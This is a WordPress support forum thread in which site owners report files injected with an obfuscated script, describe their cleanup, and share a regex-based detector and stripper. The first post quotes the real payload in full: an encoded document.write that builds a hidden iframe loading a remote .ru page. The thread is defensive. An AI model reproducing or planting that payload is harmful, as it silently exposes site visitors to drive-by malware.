• Last week my site was hacked. Multiple WordPress files had the following code appended at the very end:

    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45%2C100%2C118%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>

    This was in many wp-*.php files. I wiped my entire website's HTTP root and installed the latest version of WP (2.3.3), since I was running an older version and I knew there were security fixes. I thought I was covered, until last night the same exact exploit was performed on my site. Again, this is a 100% clean 2.3.3 installation. I’m 99% confident this has nothing to do with a password hack or any type of internal access, since the JS code is haphazardly appended to the end of various files. The only way I even noticed this “hack” is because the code invalidates/breaks my RSS feed.

    I found one prior instance of this hack on this board, and it was with an older version of WordPress. I have NOTHING else installed on this site; the WordPress 2.3.3 files are the only files in my HTTP root. The ONLY plugins I have installed or even on the server are Akismet and Feed Locations.

    Aside from changing my passwords (which I’m certain will not close this loophole), is there any way to prevent this from happening?

Viewing 16 replies (of 16 total)
  • benfitts (@benfitts)

    I got the same report from my web host. Someone was reporting JS/Downloader-AUD on one of our blogs.

    The blog was running an older WordPress 2.1.3 version.

    As in AldebaranJill's case, the hacker was able to append their JavaScript onto the end of the header for my WordPress theme.

    For your reference, it had a comment which made me think it was for a stats package, but I knew we were using Google Analytics, so I knew this code was probably the offender. It also used some JavaScript to try and encode the iframe caused by the AUD Trojan.

    Here is what I did to fix it:
    I upgraded WordPress to 2.3.3.
    I removed the offending JavaScript code.
    I temporarily changed permissions on my theme to 644. (When we make theme changes in the future we’ll change the permissions back.)

    I hope this helps others who have had the same problem.
    – Ben Fitts

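Both posters removed the appended block by hand. The following is an added example, not code from either post or from WordPress; it automates the "find the appended `eval(unescape(...))` script and strip it" step over file contents, matching only a `<script>` block of that shape sitting at the very end of the file (the position that breaks the RSS feed), so legitimate theme JavaScript elsewhere in a file is left alone. The sample file contents, the function names (`findInjectedScript`, `stripInjectedScript`) and the short encoded string inside the sample are constructed for this example.

```javascript
// Added example (not from the original thread): detect and strip an
// appended <script> eval(unescape("...")) </script> block from the end of a
// PHP/theme file's contents. Works on strings so it runs offline; feed it
// fs.readFileSync(path, "utf8") and write back the result to clean a real tree.

// Matches the exact shape quoted in the thread. The trailing \s*$ anchors the
// match to the end of the file, where the injection was appended; an
// eval(unescape(...)) in the middle of a file is not touched by this pattern.
const INJECTED_SCRIPT =
  /<script[^>]*>\s*eval\(unescape\((["'])[^"']*\1\)\)\s*;?\s*<\/script>\s*$/i;

// Returns where the injected block starts and the block itself, or null.
function findInjectedScript(phpSource) {
  const m = INJECTED_SCRIPT.exec(phpSource);
  return m ? { index: m.index, snippet: m[0].trim() } : null;
}

// Returns the source with the injected block removed (trailing whitespace
// normalised to a single newline) and whether anything changed.
function stripInjectedScript(phpSource) {
  const hit = findInjectedScript(phpSource);
  if (!hit) return { changed: false, source: phpSource };
  const cleaned = phpSource.slice(0, hit.index).replace(/\s+$/, "") + "\n";
  return { changed: true, source: cleaned };
}

// Constructed sample: a minimal wp-style file, then the same file with a
// payload of the thread's shape appended after the closing ?>. The encoded
// string here is a harmless stand-in (it decodes to document.write();).
const CLEAN_FILE =
  "<?php\n// wp-sample.php (constructed for this example)\necho 'hello';\n?>\n";
const INJECTED_FILE =
  CLEAN_FILE +
  '<script language="JavaScript"> eval(unescape("document.write%28%29%3B")); </script>';

// Usage: node strip.js
for (const [name, src] of [["clean", CLEAN_FILE], ["injected", INJECTED_FILE]]) {
  const hit = findInjectedScript(src);
  console.log(name + ": " + (hit ? "injected block found at offset " + hit.index : "no injection"));
}
```

Run it over every `*.php` in the document root (and the theme's `header.php`, where benfitts found his copy), then check whether anything outside the web root, such as cron jobs or `.htaccess`, was touched as well; if the files are re-infected after a clean reinstall, as the original poster reports, stripping the script only treats the symptom, and the write access that put it there is still open.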
  • The topic ‘WordPress 2.3.3 HACKED’ is closed to new replies.